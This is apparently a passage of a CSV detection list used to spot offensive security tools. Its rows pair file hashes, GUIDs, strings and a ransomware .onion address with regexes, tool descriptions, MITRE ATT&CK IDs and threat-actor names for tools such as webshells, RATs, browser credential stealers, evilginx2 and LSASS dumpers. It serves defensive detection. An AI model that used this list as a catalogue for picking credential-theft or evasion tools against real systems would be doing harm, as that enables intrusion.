"*7f0ed3a7c9e2ece2c8cb6a9e889774e7616dba199a4bb2e1cfb9d425d41ae199*",".{0,1000}7f0ed3a7c9e2ece2c8cb6a9e889774e7616dba199a4bb2e1cfb9d425d41ae199.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29801"
"*7f0f9593260859c0e292aa1b76d618a71c83a1d26ba802ba7853f4637d1922e6*",".{0,1000}7f0f9593260859c0e292aa1b76d618a71c83a1d26ba802ba7853f4637d1922e6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29802"
"*7f16b72d7c9bcef82978a2c926e7b3b204b372d40c0b3e06f9673b200f2174aa*",".{0,1000}7f16b72d7c9bcef82978a2c926e7b3b204b372d40c0b3e06f9673b200f2174aa.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29803"
"*7f18b60690bd7e02064e1e8f6bec4496c77f6b33d2efcac94b16314919d0e2dc*",".{0,1000}7f18b60690bd7e02064e1e8f6bec4496c77f6b33d2efcac94b16314919d0e2dc.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29804"
"*7f1a5a5648f8105399e932839d8e73274e98349da3765e9cb388c005edad93a2*",".{0,1000}7f1a5a5648f8105399e932839d8e73274e98349da3765e9cb388c005edad93a2.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","29805"
"*7f21ed0e3b0f5dbc1b1415b85df5c0c125c64aac320d9f23de6e120ab2285110*",".{0,1000}7f21ed0e3b0f5dbc1b1415b85df5c0c125c64aac320d9f23de6e120ab2285110.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29807"
"*7f2b0703267297d62119fe11c3f8846f9fafa906b6da577e4480f5fc4914c3e1*",".{0,1000}7f2b0703267297d62119fe11c3f8846f9fafa906b6da577e4480f5fc4914c3e1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29810"
"*7f3c414abe39b6e9ab37c48d5962f421ea91971a21f3eb1a9ff1789fafc6649e*",".{0,1000}7f3c414abe39b6e9ab37c48d5962f421ea91971a21f3eb1a9ff1789fafc6649e.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","#filehash","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","29812"
"*7f3e3d8e8a2f6be44925fe45ec065c0d3f5d8c578e5dc436e677462d53efb2b9*",".{0,1000}7f3e3d8e8a2f6be44925fe45ec065c0d3f5d8c578e5dc436e677462d53efb2b9.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","29813"
"*7f461d71b6833275b34bd49c459e07cc6a71aa7263db7fbcaceaf6c154300858*",".{0,1000}7f461d71b6833275b34bd49c459e07cc6a71aa7263db7fbcaceaf6c154300858.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29814"
"*7f4cb93deb3d53403cc8f23e7d07ad8a8ff7c327ba9362eeb330e5489649da8e*",".{0,1000}7f4cb93deb3d53403cc8f23e7d07ad8a8ff7c327ba9362eeb330e5489649da8e.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","#filehash","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","29817"
"*7f5ac429cd84d6ac935855b8a7656b830a6eefa1884f7fddd8c7c893c6b09ca4*",".{0,1000}7f5ac429cd84d6ac935855b8a7656b830a6eefa1884f7fddd8c7c893c6b09ca4.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","#filehash","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","29820"
"*7f5bf0735a01899a8420d4247508aa7f09af346cb434baa5cdf024200ebf4f35*",".{0,1000}7f5bf0735a01899a8420d4247508aa7f09af346cb434baa5cdf024200ebf4f35.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29821"
"*7f5d5571d141b858ce93d450002ac8c78b7d9141498771c2579407569dee1464*",".{0,1000}7f5d5571d141b858ce93d450002ac8c78b7d9141498771c2579407569dee1464.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","29823"
"*7f64f0074988005bfda114e773e9cfcd9fe700f37c779105205153430d514ab6*",".{0,1000}7f64f0074988005bfda114e773e9cfcd9fe700f37c779105205153430d514ab6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29824"
"*7f73a800a012c6b522a92074901c256d947a7a080bc2efb3da65784b2f50a054*",".{0,1000}7f73a800a012c6b522a92074901c256d947a7a080bc2efb3da65784b2f50a054.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","29826"
"*7f861f80620136ae0418cecf780c0c4896b4e7b8763cbaa232104ec7b99acdf5*",".{0,1000}7f861f80620136ae0418cecf780c0c4896b4e7b8763cbaa232104ec7b99acdf5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29828"
"*7f8e123e9191b4e2299eb159da8776f51430445847529ff1f01b469acb04be2b*",".{0,1000}7f8e123e9191b4e2299eb159da8776f51430445847529ff1f01b469acb04be2b.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","29829"
"*7f94002b26b9570c8cf791cb5adf2b721b678c1b1e07a40ca4aa39c5633b3d15*",".{0,1000}7f94002b26b9570c8cf791cb5adf2b721b678c1b1e07a40ca4aa39c5633b3d15.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29830"
"*7f994093b3133e5450cd89d4a9cc39cceca8bbcce8845665f86b4d7eb9998d61*",".{0,1000}7f994093b3133e5450cd89d4a9cc39cceca8bbcce8845665f86b4d7eb9998d61.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","#filehash","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","29831"
"*7f99e59cb3242638aa4967180674b98dd770fae51a85ff364238faf52e02a586*",".{0,1000}7f99e59cb3242638aa4967180674b98dd770fae51a85ff364238faf52e02a586.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","#filehash","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","29832"
"*7f9d8f3147127bd0bbce2ac04a05747ca2a7ce962c2584b5be197ee75fcad18c*",".{0,1000}7f9d8f3147127bd0bbce2ac04a05747ca2a7ce962c2584b5be197ee75fcad18c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29833"
"*7fa350350fc1735a9b6f162923df8d960daffb73d6f5470df3c3317ae237a4e6*",".{0,1000}7fa350350fc1735a9b6f162923df8d960daffb73d6f5470df3c3317ae237a4e6.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","29834"
"*7fa4e734f5dddd6e3e912dda25a744ffa615735a9e65ac1319412cd4fb91d1cc*",".{0,1000}7fa4e734f5dddd6e3e912dda25a744ffa615735a9e65ac1319412cd4fb91d1cc.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","29836"
"*7fa5122ff9fabaf2676064087eacaf4a63b386bb27d50ac345ff4bdbe6a4f7d5*",".{0,1000}7fa5122ff9fabaf2676064087eacaf4a63b386bb27d50ac345ff4bdbe6a4f7d5.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","0","#filehash","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","29837"
"*7fa6c0c97030dea92f7fc81f4fee7bbf42e4fe914832ffb0ce22fe001928ae67*",".{0,1000}7fa6c0c97030dea92f7fc81f4fee7bbf42e4fe914832ffb0ce22fe001928ae67.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29838"
"*7fa9f247b1b89382e6eedc622dbd5951f088cfff0dc517f3c7f0bb4519c30e7c*",".{0,1000}7fa9f247b1b89382e6eedc622dbd5951f088cfff0dc517f3c7f0bb4519c30e7c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29839"
"*7fb6399a2b17a066190f2eb003a9ce46ebc23fd1c93ab912738067782618e0af*",".{0,1000}7fb6399a2b17a066190f2eb003a9ce46ebc23fd1c93ab912738067782618e0af.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29843"
"*7fcb7a2af36c0dff045a30ff301ff523f8140fd7b35010991fe05e6f16c5a45d*",".{0,1000}7fcb7a2af36c0dff045a30ff301ff523f8140fd7b35010991fe05e6f16c5a45d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29844"
"*7fcc036a7fba571b7f2928f0a6a0e0838cb9e1a2a8231f9c30ce5baa144e8108*",".{0,1000}7fcc036a7fba571b7f2928f0a6a0e0838cb9e1a2a8231f9c30ce5baa144e8108.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","29845"
"*7fd016446b62d4ea4aa197de85f3f45f58cf0f0f85c1cd9d7bf37fdee27d182b*",".{0,1000}7fd016446b62d4ea4aa197de85f3f45f58cf0f0f85c1cd9d7bf37fdee27d182b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29846"
"*7fd9f158c430a2d17fcd8fac698cfe71ef4f6530c2df824247c651acd6a1f03e*",".{0,1000}7fd9f158c430a2d17fcd8fac698cfe71ef4f6530c2df824247c651acd6a1f03e.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","29848"
"*7fdb39ce9dcd83556dccda4a7480917b87ddef21edc96db5f0a1d134c40453cd*",".{0,1000}7fdb39ce9dcd83556dccda4a7480917b87ddef21edc96db5f0a1d134c40453cd.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","29849"
"*7FDCF4E0-2E6A-43D5-80FB-0A1A40AB3D93*",".{0,1000}7FDCF4E0\-2E6A\-43D5\-80FB\-0A1A40AB3D93.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","0","#GUIDproject","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","29851"
"*7fdf7529eb3c25f47136fa12a74040e38f4eda6cdd66f760977e537a292abea6*",".{0,1000}7fdf7529eb3c25f47136fa12a74040e38f4eda6cdd66f760977e537a292abea6.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","29852"
"*7fe4d08596fc13f16ed9bc29345a09a153e7e006bad88289836092bfc0e1ff1d*",".{0,1000}7fe4d08596fc13f16ed9bc29345a09a153e7e006bad88289836092bfc0e1ff1d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","29853"
"*7fe5b73ee8105622ab74be4fae9f5f0a9b2a8b496770d84b58a7c0ce8a457551*",".{0,1000}7fe5b73ee8105622ab74be4fae9f5f0a9b2a8b496770d84b58a7c0ce8a457551.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","29854"
"*7fef9543926764b6093a5ab10ea9d092f9a97acae14dbfd423a7c52cc9454fdb*",".{0,1000}7fef9543926764b6093a5ab10ea9d092f9a97acae14dbfd423a7c52cc9454fdb.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#filehash","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","29855"
"*7ffa4105462bd53c5b1632324b3e7ddb71b18b57e8ecd60fc849b433a036198e*",".{0,1000}7ffa4105462bd53c5b1632324b3e7ddb71b18b57e8ecd60fc849b433a036198e.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","29860"
"*7ffce7f6d7262f214d78e6b7fd8d07119835cba4b04ce334260665d7c8fb369a*",".{0,1000}7ffce7f6d7262f214d78e6b7fd8d07119835cba4b04ce334260665d7c8fb369a.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","#filehash","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","29861"
"*7H0LmBxFtXBPd0/3vHe7Z3dmdrPZmTzp3ZldQrJ5LOGxeZ*",".{0,1000}7H0LmBxFtXBPd0\/3vHe7Z3dmdrPZmTzp3ZldQrJ5LOGxeZ.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","N/A","8","3","282","57","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z","29863"
"*7L0LgBxFtTDc093TPe/dntnM7G6Sncm*",".{0,1000}7L0LgBxFtTDc093TPe\/dntnM7G6Sncm.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","N/A","8","3","282","57","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z","29865"
"*7tkffbh3qiumpfjfq77plcorjmfohmbj6nwq5je6herbpya6kmgoafid.onion*",".{0,1000}7tkffbh3qiumpfjfq77plcorjmfohmbj6nwq5je6herbpya6kmgoafid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","29866"
"*7z2john.pl*",".{0,1000}7z2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","29867"
"*80 253 149 118 169 176 183 169 182 184*",".{0,1000}80\s253\s149\s118\s169\s176\s183\s169\s182\s184.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#content","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","29868"
"*8002519fb85548854d30580a8db65ccd4624ce284d13230ad8b3e6366c8f093a*",".{0,1000}8002519fb85548854d30580a8db65ccd4624ce284d13230ad8b3e6366c8f093a.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#filehash","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","29870"
"*80063f3e9fee6ced4f159714bd00ba61d757fd185621d82330bed16d4c2eb495*",".{0,1000}80063f3e9fee6ced4f159714bd00ba61d757fd185621d82330bed16d4c2eb495.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29871"
"*80086e7ab0990319d4f61b69990eda05ff16dcd836c3b489b2bf8a189bc0c08e*",".{0,1000}80086e7ab0990319d4f61b69990eda05ff16dcd836c3b489b2bf8a189bc0c08e.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor 